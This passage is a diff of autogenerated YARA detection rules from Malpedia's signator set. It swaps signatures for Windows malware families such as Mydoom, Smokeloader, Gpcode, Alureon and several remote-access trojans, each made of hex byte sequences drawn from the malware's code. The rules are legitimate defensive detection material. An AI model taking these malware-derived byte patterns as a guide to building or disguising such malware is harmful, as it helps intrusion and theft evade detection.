+		$sequence_9 = { c7868c00000000000000 7711 c786f800000003000000 32c0 e9???????? 33c9 c78424d000000007000000 }
 
 	condition:
-		7 of them and filesize < 223680
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Mydoom_Auto : FILE
+rule MALPEDIA_Win_Action_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "68282348-e634-5e24-a89b-07582d0aeab6"
+		id = "7c57309a-67d2-511f-b446-07a8dac55b8c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mydoom_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.action_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.action_rat_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "26adeacf80adc41cd09ac09890246c8c37a7ca914ae80276202f0defea3500e4"
+		logic_hash = "804b12281cf1f625ad4f62982be2e6f06ae13a4b27a9fb038471c045c4dd26b6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81477,32 +81851,32 @@ rule MALPEDIA_Win_Mydoom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b800000000 e9???????? 8b830c040000 800801 c744240402000000 8b4304 890424 }
-		$sequence_1 = { 7502 89d0 5d c3 }
-		$sequence_2 = { c7442404???????? 8d9d68ffffff 891c24 e8???????? c744240c28000000 8d8538ffffff 89442408 }
-		$sequence_3 = { b000 f2ae f7d1 49 c781????????2e657865 }
-		$sequence_4 = { 0fb6442eb8 884707 e8???????? 89c6 }
-		$sequence_5 = { 8d9dc8f9ffff 891c24 e8???????? 8d8568f9ffff 89442424 89742420 }
-		$sequence_6 = { 85c0 0f84cc000000 897c2410 8d85e0feffff 8944240c 89742408 }
-		$sequence_7 = { 8b5d08 8b4514 8945f4 c745f001000000 8d45f8 }
-		$sequence_8 = { ffd0 8b15???????? 83eb04 39d3 73eb 8d742600 }
-		$sequence_9 = { 83ec04 b800000000 eb21 8b85d8feffff 890424 e8???????? }
+		$sequence_0 = { 33c5 8945f0 50 8d45f4 64a300000000 894de8 c745e400000000 }
+		$sequence_1 = { 85c9 7533 8b5508 83c210 52 e8???????? 83c404 }
+		$sequence_2 = { 85c9 740d 68???????? 8d4dd4 e8???????? 8d4dec e8???????? }
+		$sequence_3 = { 50 8b8d84fbffff 51 8d8d64fcffff e8???????? 50 8b958cfbffff }
+		$sequence_4 = { 8bec 83ec08 894dfc 8b45fc 8b08 e8???????? }
+		$sequence_5 = { 43 0010 b543 0010 0007 07 }
+		$sequence_6 = { c645fc03 83ec28 8bf4 896580 8d4de4 51 e8???????? }
+		$sequence_7 = { 8a08 884dff 8b5508 8a02 8845fe 0fb64dff }
+		$sequence_8 = { 52 8b4dfc 83c134 e8???????? 8b4508 83c03c 50 }
+		$sequence_9 = { 8d8d4cffffff e8???????? 8d4dc0 e8???????? 50 8d4dc0 e8???????? }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 480256
 }
-rule MALPEDIA_Win_Voldemort_Auto : FILE
+rule MALPEDIA_Win_Grateful_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "115d33d2-50af-5fac-a879-fb480a2fd38a"
+		id = "9ee923d9-386a-5d32-9440-a8b85e81712d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.voldemort"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.voldemort_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.grateful_pos_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "f8d7f88b5cd57c32e85ea5f0ae8c31ab594e2a2acc618e6a4574791256fd098d"
+		logic_hash = "ee462fd47d72681e88085a94b5322cb383fccf63de7910d0f50a42105a7d61e3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81516,32 +81890,38 @@ rule MALPEDIA_Win_Voldemort_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bd9 4d896bd0 488d0de3ea0200 4d8be8 4d8973c8 0f57c0 4d897bc0 }
-		$sequence_1 = { e8???????? 488bd8 4885c0 7517 488d0daf740300 e8???????? }
-		$sequence_2 = { 4885c0 7517 488d0de43b0300 e8???????? 488bc8 e8???????? 488bd8 }
-		$sequence_3 = { 80fa80 73e9 4c8bc3 4d2bc1 4c3bcb 4d0f47c5 4d85c0 }
-		$sequence_4 = { 488b7c2450 488d0d0e7b0300 e8???????? 488bc8 e8???????? 4c8bac2490000000 488bd8 }
-		$sequence_5 = { 488b8540090000 41b808020000 48894c2468 488d8da0000000 4889442458 4c894c2448 e8???????? }
-		$sequence_6 = { 48894108 488b4710 48894808 48ffc6 493bf7 7caf 4885ff }
-		$sequence_7 = { d3e0 83c107 0bf8 80fa80 73e9 4c8bc3 4d2bc1 }
-		$sequence_8 = { 488bd5 488bce e8???????? 4963de 4803c3 483bc5 7626 }
-		$sequence_9 = { 488bc8 e8???????? 488bd8 4885c0 7517 488d0dde400300 e8???????? }
+		$sequence_0 = { 7407 b8f6ffffff eb02 33c0 }
+		$sequence_1 = { 7411 e8???????? e8???????? 33c0 e9???????? }
+		$sequence_2 = { b8feffffff eb1a b8fdffffff eb13 b8fcffffff }
+		$sequence_3 = { e8???????? 99 b980ee3600 f7f9 }
+		$sequence_4 = { eb07 b8fcffffff eb02 33c0 }
+		$sequence_5 = { 83f801 7510 e8???????? e8???????? }
+		$sequence_6 = { 0f858d000000 833d????????00 745a 6a28 8d9574ffffff }
+		$sequence_7 = { e8???????? 83c40c 8b45fc 8b4d0c 8b510c }
+		$sequence_8 = { e8???????? 83c410 8b85e0fbffff 0385dcfbffff }
+		$sequence_9 = { 83c408 85c0 0f8451010000 c605????????01 c68572f9ffff00 }
+		$sequence_10 = { 8b4dbc 894dcc 8b55d0 8955b4 8b45d0 83e801 }
+		$sequence_11 = { 8bb5f4fffdff 03b5f8fffdff c1ee03 8b4508 8b7810 8b85f4fffdff 0385f8fffdff }
+		$sequence_12 = { 51 c705????????00000000 eb0d a1???????? 83c001 a3???????? 8b4d08 }
+		$sequence_13 = { 888d74fdffff 68ff000000 6a00 8d9575fdffff 52 }
+		$sequence_14 = { 888424c1000000 b801000000 486bc012 488d0df2cb0100 0fbe0401 83f04d }
+		$sequence_15 = { 03d0 69d290010000 3bca 7414 488d3db7b5feff 4963e9 448b94af14690300 }
 
 	condition:
-		7 of them and filesize < 561152
+		7 of them and filesize < 3964928
 }
-rule MALPEDIA_Win_Lunchmoney_Auto : FILE
+rule MALPEDIA_Win_Gpcode_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a8ab5f04-a830-5276-852a-dc32304e8dce"
+		id = "e33e0b1f-76e7-5d87-9046-4de404cd3f75"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lunchmoney_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gpcode_auto.yar#L1-L198"
 		license_url = "N/A"
-		logic_hash = "6507a60182b28ed10fdd4ed1c7e21ccd1e2f0dc103e23e1d246a1843603fe4d9"
+		logic_hash = "8f09c23237c11f87162aa59c119a2d6f06242220cf4c97226be012f001eb9b62"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81555,32 +81935,42 @@ rule MALPEDIA_Win_Lunchmoney_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83ec18 8bcf 54 e8???????? 8bce e8???????? 83ec18 }
-		$sequence_1 = { 8d0c00 894dec eb38 8b45f4 8b048550914200 8d4dec 6a00 }
-		$sequence_2 = { 6a01 8d4dbc e8???????? 8bb570ffffff 8dbb04010000 ba???????? 8bcf }
-		$sequence_3 = { 7202 8b09 8d55e4 e8???????? 8d4b24 8945d4 }
-		$sequence_4 = { 6a03 6a09 8d45bc 50 8d4b4c }
-		$sequence_5 = { 8bce 50 e8???????? 50 8d4da4 }
-		$sequence_6 = { 8bcf e8???????? 50 6a09 57 8bce }
-		$sequence_7 = { eb5a 56 e8???????? 59 8365fc00 8b049d50914200 }
-		$sequence_8 = { 33d2 8d4da4 385588 b800008000 0f45d0 837db808 52 }
-		$sequence_9 = { 8d86f8000000 83c124 3bc8 740a 6aff 6a00 50 }
+		$sequence_0 = { ff35???????? ff35???????? e8???????? a1???????? a3???????? 6800001000 }
+		$sequence_1 = { c3 ff35???????? e8???????? e8???????? c705????????01000000 c3 55 }
+		$sequence_2 = { 68???????? e8???????? 91 6a00 }
+		$sequence_3 = { a1???????? a3???????? 6800001000 68???????? ff35???????? 6a00 }
+		$sequence_4 = { 68f4010000 e8???????? 833d????????01 75ed e8???????? }
+		$sequence_5 = { 53 a1???????? 6bc008 50 6a40 e8???????? 85c0 }
+		$sequence_6 = { f7f1 8bc8 bb???????? 51 6a41 53 }
+		$sequence_7 = { e8???????? 03df eb0a c705????????00000000 8b0b }
+		$sequence_8 = { 53 8d4508 ff30 e8???????? 8bc8 8d5d08 }
+		$sequence_9 = { ff75fc ff75ec e8???????? ff75f8 e8???????? 8b5dec 6a10 }
+		$sequence_10 = { 83c4ec 6800050000 68???????? 6a00 e8???????? 6a0a 68???????? }
+		$sequence_11 = { 2d???????? 50 8d85e8feffff 50 68???????? e8???????? }
+		$sequence_12 = { 0005???????? 0fb605???????? 8ad3 8d80b8fee014 }
+		$sequence_13 = { 0106 eb94 55 8bec }
+		$sequence_14 = { 0016 40 3bc3 72de }
+		$sequence_15 = { 000c38 40 3b45f8 72e3 }
+		$sequence_16 = { 000e eb08 02c9 b2f9 }
+		$sequence_17 = { 011c07 ebc3 91 668b01 }
+		$sequence_18 = { 001438 eb06 80c107 000c38 }
+		$sequence_19 = { 0144240c 85f6 7fdd 33c0 }
 
 	condition:
-		7 of them and filesize < 373760
+		7 of them and filesize < 761856
 }
-rule MALPEDIA_Win_Darkvnc_Auto : FILE
+rule MALPEDIA_Win_Alureon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1f59578f-2ca5-52a8-837e-fa2b82f60870"
+		id = "a73dc24e-01b5-5374-84bf-44615f6f8c40"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkvnc_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.alureon_auto.yar#L1-L177"
 		license_url = "N/A"
-		logic_hash = "059ffb48bc28e567c2e6dc5e6789fbdcb5b40c4bf8dddefcf2a4e68738b127e3"
+		logic_hash = "3ffa46b9256035a0465adbbc3bd0212addd530491396c5f57b5bebbc944d0354"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81594,32 +81984,38 @@ rule MALPEDIA_Win_Darkvnc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b442404 488b4c2420 0fb70441 83f825 752f 8b0424 b925000000 }
-		$sequence_1 = { 48894130 8b4108 2b01 894138 7456 488b4328 }
-		$sequence_2 = { 488b442478 4839842480000000 7417 4c8b842480000000 33d2 488b0d???????? ff15???????? }
-		$sequence_3 = { 7406 ff15???????? 85db 7408 8bcb ff15???????? 488bc6 }
-		$sequence_4 = { 498bf6 3b6efc 754a f70600000040 7430 e8???????? 83f805 }
-		$sequence_5 = { 85db 755d 488b4df0 ff15???????? 8b4540 448bce 4c8b4530 }
-		$sequence_6 = { 3bc7 74c3 488bcb e8???????? 85b3f0000000 754d ff15???????? }
-		$sequence_7 = { 4585db 0f8e86000000 4c63742458 4963e8 498d041e 4c8be9 }
-		$sequence_8 = { 750c 488b442438 4889442440 eb47 eb24 488b442428 488b00 }
-		$sequence_9 = { 4883c020 4889442430 488b442430 83780400 0f849f000000 488b542440 488b442430 }
+		$sequence_0 = { 75f8 8b55ec 8b7de8 52 89530c 897b10 }
+		$sequence_1 = { 8d4520 48 89442430 c744242814d00400 48 894c2420 }
+		$sequence_2 = { 8bd0 8955fc 85d2 0f8451010000 32c0 8bce }
+		$sequence_3 = { 8d43d8 66894520 8bc1 44 894d2c c1e818 41 }
+		$sequence_4 = { 88442447 8d442424 50 6a60 }
+		$sequence_5 = { 668945f4 8d45f0 50 6a01 }
+		$sequence_6 = { 48 81ecf0000000 48 8d6c2470 48 83e5e0 33c0 }
+		$sequence_7 = { ff75f8 ff15???????? 85c0 7865 ff75b8 8d8598f9ffff 68???????? }
+		$sequence_8 = { 50 8d85f8fcffff 68???????? 50 ffd6 83c418 }
+		$sequence_9 = { c645f636 c645f71f c645f83d c645f929 c645fa3b c645fb00 e8???????? }
+		$sequence_10 = { ab ab ab ab 8d442444 8944247c 53 }
+		$sequence_11 = { 53 57 8975f4 e8???????? 8b45f4 83c40c }
+		$sequence_12 = { 74c5 395df8 7409 ff75f8 ff15???????? }
+		$sequence_13 = { c645d002 c645d111 c645d23a c645d330 c645d401 }
+		$sequence_14 = { 75c5 56 ff15???????? 8a45ff 5e 5b c9 }
+		$sequence_15 = { 85c0 0f84f2020000 53 53 6a03 }
 
 	condition:
-		7 of them and filesize < 606208
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Mulcom_Auto : FILE
+rule MALPEDIA_Win_Deputydog_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4a9d49d8-b0ca-5241-8b60-6dc35ab732b6"
+		id = "3df82804-d079-5fb4-95b9-354c74dddd14"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mulcom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mulcom_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.deputydog_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "372ee2b3e45726bdecfcc73339ca35421a12f3ab3e84538dcc5c7a553f146e2b"
+		logic_hash = "d4b2e1db63035282e2b2efcdd04dae6225d4a7dc6ab7fb9164349c69dbcffada"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81633,32 +82029,32 @@ rule MALPEDIA_Win_Mulcom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b442448 4839442440 0f84fc010000 488d15136d0300 488d4dc8 e8???????? 90 }
-		$sequence_1 = { e8???????? 488d4c2450 48837c246810 480f434c2450 4c897c2438 4c897c2430 895c2428 }
-		$sequence_2 = { 740b 488d4900 83c102 d1ea 75f9 4183f802 }
-		$sequence_3 = { 4533c9 33c9 448d4602 41ffd5 85c0 0f85c9050000 33c0 }
-		$sequence_4 = { 488b05???????? 4833c4 488985a0040000 4c8b9508050000 488d056c5f0200 0f1000 4c8bd9 }
-		$sequence_5 = { 85c9 7835 8b542438 85d2 782d 448b44243c 4585c0 }
-		$sequence_6 = { ff15???????? 0f104588 0f1145c8 0f104d98 0f114dd8 660f6f05???????? f30f7f4598 }
-		$sequence_7 = { 48c1e83f 4803d0 49ba8661188661188601 493bd2 0f84f9010000 4c8d7a01 488b4e10 }
-		$sequence_8 = { 488bcb e8???????? 4883ef01 75c9 488bc3 488b5c2448 4883c430 }
-		$sequence_9 = { 49baa1a0a0a0a0a0a0a0 4c8bf1 498bc2 488b4908 498be8 49f7e9 }
+		$sequence_0 = { 8bcb 33c0 8dbd2efdffff f3ab 66ab ff15???????? 8b3d???????? }
+		$sequence_1 = { 8b5108 894108 8b4508 5f }
+		$sequence_2 = { 897df0 53 50 8d8538ffffff }
+		$sequence_3 = { 8b4718 8b30 3bf0 0f8482000000 8b4e08 8d45e0 50 }
+		$sequence_4 = { 885dfc 59 8906 57 8d4dc8 ff15???????? 834dfcff }
+		$sequence_5 = { 56 6a03 33d2 5b 8bcb f7f1 8b4d0c }
+		$sequence_6 = { 8b7e08 8d1419 397d08 7417 8bc2 2bc1 2bc3 }
+		$sequence_7 = { e8???????? 8bf0 ff7514 8b06 834dfcff }
+		$sequence_8 = { 55 50 ffd3 ff7624 ffd7 896e24 8b4614 }
+		$sequence_9 = { 5f 0f84e9000000 8b7108 2bf0 3bf7 0f85a0000000 3810 }
 
 	condition:
-		7 of them and filesize < 867328
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Cmstar_Auto : FILE
+rule MALPEDIA_Win_Merdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "573d55cd-4176-58c6-b881-46544636e3cc"
+		id = "ef7053a5-476a-59b5-8ddd-5293675500e6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cmstar_auto.yar#L1-L170"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.merdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.merdoor_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "a019849b15c13075d7ee37f6ab493df0eaba09a0dd6bc46a1e79b4c730b7a0f1"
+		logic_hash = "33a0b0b418ee0e7fb6e555149df68449fe325aead89e3fe3bc9a1904f1b68daf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81672,40 +82068,34 @@ rule MALPEDIA_Win_Cmstar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 bb04010000 57 53 }
-		$sequence_1 = { 836dfc10 ff75fc 8945e0 8b45dc 83c310 }
-		$sequence_2 = { 8bc6 e9???????? 6a10 8d45d0 53 }
-		$sequence_3 = { ff15???????? 6a03 58 5f 5e 5b c9 }
-		$sequence_4 = { ff15???????? 6a04 e8???????? be00040000 }
-		$sequence_5 = { 7504 6a03 eb0d 803b4d }
-		$sequence_6 = { 8b4dec c1e802 6a04 52 8d0481 50 }
-		$sequence_7 = { ff75e0 ff30 e8???????? 8b4df8 }
-		$sequence_8 = { bf???????? 8882a8430010 83c9ff 33c0 42 f2ae f7d1 }
-		$sequence_9 = { 85f6 889183420010 8b15???????? 7506 8b35???????? bf???????? 83c9ff }
-		$sequence_10 = { 889c2418050000 f3ab 66ab aa }
-		$sequence_11 = { 8a4601 46 84c0 75e1 83c9ff 33c0 f2ae }
-		$sequence_12 = { 7422 3cff 741e fec8 8841ff }
-		$sequence_13 = { 64890d00000000 81c4c0120000 c3 8b8c24d0120000 33db 3bcb 741c }
-		$sequence_14 = { ffd5 68???????? 53 ffd5 8bd0 83c9ff }
-		$sequence_15 = { f7d1 49 741e 8a441420 bf???????? 8882a8430010 }
+		$sequence_0 = { 8d45d4 53 0f4345d4 6a01 }
+		$sequence_1 = { 8bd9 83ff40 7308 5f 33c0 5b 5d }
+		$sequence_2 = { 85c0 742e 8d7808 b9a8000000 be???????? f3a5 e8???????? }
+		$sequence_3 = { 83c40c 8934fd78f30110 eb07 56 e8???????? 59 c745fcfeffffff }
+		$sequence_4 = { 8d8594feffff 50 57 6a00 ff9578fdffff 8bd8 85db }
+		$sequence_5 = { 8b4de0 85c9 7449 8b45e8 894dd0 8d4de0 51 }
+		$sequence_6 = { 8981b0020000 ff75e0 ff15???????? 8b45f8 5f 5e 5b }
+		$sequence_7 = { 0fb7c0 eb0b 8b8d78ffffff 83c102 03c1 50 57 }
+		$sequence_8 = { 64a300000000 8bf9 897da8 8b8f50040000 85c9 7405 8b01 }
+		$sequence_9 = { b010 2ac1 f6d0 fec1 3084156cfcffff 42 80f910 }
 
 	condition:
-		7 of them and filesize < 4268032
+		7 of them and filesize < 307200
 }
-rule MALPEDIA_Win_Lightrail_Auto : FILE
+rule MALPEDIA_Win_Smokeloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a2a74e32-804b-5428-a5eb-18775f1f39d2"
+		id = "f23556ba-5c41-5731-b926-98b3ff953aa7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightrail"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lightrail_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.smokeloader_auto.yar#L1-L557"
 		license_url = "N/A"
-		logic_hash = "ac0b981cc1c6ed97eba28af6c8430a26e5eab1fbb0f4ef4ac4d4556d0f8dc830"
+		logic_hash = "14e5b0cfca13af7489c48288e9aa993c0a3271acbd4222a869c5d82af431f76e"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -81717,32 +82107,87 @@ rule MALPEDIA_Win_Lightrail_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d48bf 6683f919 7707 6683c020 668902 0fb74202 4883c202 }
-		$sequence_1 = { 6683c020 668902 0fb74202 4883c202 6685c0 }
-		$sequence_2 = { 8bda 4c8d05927d0000 488bf9 488d1550740000 b912000000 e8???????? }
-		$sequence_3 = { 776a e8???????? 85c0 7428 85db 7524 488d0d36720100 }
-		$sequence_4 = { eb49 8a07 4c8d05d354ffff 4b8b8ce010a70100 ffc3 895d9b }
-		$sequence_5 = { 03d8 0fb601 85c0 75f0 0fb6442430 488d4c2430 81f344434241 }
-		$sequence_6 = { 8d42ff 3bc8 72e6 8d42ff 41894008 }
-		$sequence_7 = { c745e86c6c0000 488d4de0 ffd0 488bd8 4885db 7504 33c0 }
-		$sequence_8 = { 488d3d4e260100 eb10 488d3d55260100 eb07 }
-		$sequence_9 = { ff9660020000 e9???????? 4883f902 0f85a1feffff }
+		$sequence_0 = { ff15???????? 8d45f0 50 8d45e8 50 8d45e0 50 }
+		$sequence_1 = { 50 8d45e0 50 56 ff15???????? 56 ff15???????? }
+		$sequence_2 = { 6a00 53 ff15???????? 8d45f0 }
+		$sequence_3 = { 57 ff15???????? 6a00 6800000002 6a03 6a00 6a03 }
+		$sequence_4 = { 8bf0 8d45dc 50 6a00 53 }
+		$sequence_5 = { 0fb64405dc 50 8d45ec 50 }
+		$sequence_6 = { e8???????? 8bf0 8d45fc 50 ff75fc 56 }
+		$sequence_7 = { 740a 83c104 83f920 72f0 }
+		$sequence_8 = { 50 56 681f000f00 57 }
+		$sequence_9 = { 56 8d45fc 50 57 57 6a19 }
+		$sequence_10 = { ff15???????? bf90010000 8bcf e8???????? }
+		$sequence_11 = { 668ce8 6685c0 7406 fe05???????? }
+		$sequence_12 = { 56 ff15???????? 50 56 6a00 ff15???????? }
+		$sequence_13 = { 8b07 03c3 50 ff15???????? }
+		$sequence_14 = { 33c0 e9???????? e8???????? b904010000 }
+		$sequence_15 = { 6a40 56 6a01 8d45f8 50 }
+		$sequence_16 = { 03e8 03e9 81e5ff000000 8a442c18 88443c18 47 }
+		$sequence_17 = { 8bde 8bfe 399c241c010000 7644 8b6c2410 47 }
+		$sequence_18 = { 0fb64c3c18 0fb6c2 03c8 81e1ff000000 8a440c18 30042b 43 }
+		$sequence_19 = { 8d8de8fdffff 50 50 50 }
+		$sequence_20 = { 8985ecfdffff ffb5f0fdffff 50 53 e8???????? }
+		$sequence_21 = { 8d85f0fdffff 8b750c 8b7d10 50 57 56 }
+		$sequence_22 = { 89c6 6804010000 56 57 }
+		$sequence_23 = { 8b4514 898608020000 56 6aff }
+		$sequence_24 = { 53 e8???????? 8d8decfdffff 8d95f0fdffff }
+		$sequence_25 = { c60653 56 6a00 6a00 }
+		$sequence_26 = { 8d95f0fdffff c70200000000 6800800000 52 }
+		$sequence_27 = { 89e5 81ec5c060000 53 56 }
+		$sequence_28 = { fc 5f 5e 5b }
+		$sequence_29 = { 60 89c6 89cf fc }
+		$sequence_30 = { 30d0 aa e2f3 7505 }
+		$sequence_31 = { 89cf fc b280 31db a4 b302 }
+		$sequence_32 = { 4d 01c4 ffc9 49 }
+		$sequence_33 = { 48896c2410 4889742418 57 4883ec30 65488b042560000000 4c8b15???????? }
+		$sequence_34 = { 4883f814 72ea 488b0d???????? ff15???????? 488b0d???????? ff15???????? 488b0d???????? }
+		$sequence_35 = { 8bd7 4c8bc3 4889442420 ff15???????? 488b0b ff15???????? 8a08 }
+		$sequence_36 = { 41b800300000 ff15???????? 448b4754 488bd6 }
+		$sequence_37 = { 55 89e5 81ec54040000 53 }
+		$sequence_38 = { 01c2 31c0 ac 01c2 85c0 }
+		$sequence_39 = { 488bd8 ff15???????? 4c8d4c2454 4c8d44244c }
+		$sequence_40 = { 8b4b18 45 8b6320 4d }
+		$sequence_41 = { 49 8d3c8c 8b37 4c 01c6 }
+		$sequence_42 = { 8b7b24 4c 01c7 668b0c4f 41 8b7b1c }
+		$sequence_43 = { 01c7 8b048f 4c 01c0 }
+		$sequence_44 = { 8b4da0 8b55b8 89516c 687cda686e 8b45e4 50 }
+		$sequence_45 = { 8945f8 8b45f8 8b4868 894df4 }
+		$sequence_46 = { 31d1 75ec 58 29c6 d1ee }
+		$sequence_47 = { 57 007508 bbb84340c1 4a }
+		$sequence_48 = { 5b c9 c20800 55 89e5 83ec04 }
+		$sequence_49 = { aa e2f3 7506 7404 }
+		$sequence_50 = { 8b4da0 8b5580 895150 681256e9cc 8b45e4 50 }
+		$sequence_51 = { 3345e4 8845e3 8b4dfc 034d10 8b55f0 0355fc 034df8 }
+		$sequence_52 = { 01e8 31c9 c1c108 3208 40 }
+		$sequence_53 = { 8b5514 0355b4 39559c 7316 }
+		$sequence_54 = { 8b453c 8b7c2878 01ef 8b7720 01ee 56 }
+		$sequence_55 = { 1e 53 56 57 }
+		$sequence_56 = { 29c6 d1ee 037724 0fb7442efe }
+		$sequence_57 = { 394dfc 750e 8b55e4 2b5510 8b45f8 2bc2 8945f8 }
+		$sequence_58 = { eb0b 8b5508 0355f0 8a45ed 8802 8b4d10 034dfc }
+		$sequence_59 = { 8bec 83ec08 8b4510 2d10bf3400 8b4d0c c1e103 }
+		$sequence_60 = { 5d 5d a2???????? 95 }
+		$sequence_61 = { 17 c74424fc7c2e0000 83ec04 7504 7402 6d }
+		$sequence_62 = { ad 37 5d 0aa228b9a2ce c9 5d }
+		$sequence_63 = { d4ad d6 1d51d61d41 d6 1d55d89d52 }
+		$sequence_64 = { a2???????? ed d6 104ddc 9c }
 
 	condition:
-		7 of them and filesize < 249856
+		7 of them and filesize < 245760
 }
-rule MALPEDIA_Win_Dripion_Auto : FILE
+rule MALPEDIA_Win_Dented_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b0867d7f-74aa-587d-b520-fed580730ed1"
+		id = "3499a500-5e01-578b-aa3c-ab625e855061"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dripion"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dripion_auto.yar#L1-L112"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dented_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "b54fd3ad608c7c63f9361c36ed20fa92f663e8b7a12233b0f074e7ff124b365a"
+		logic_hash = "2522b2401dbe103d35106dff38664664351f596847e13ae16367587c7b9e72e4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81756,32 +82201,32 @@ rule MALPEDIA_Win_Dripion_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd6 03f8 7402 ffd6 }
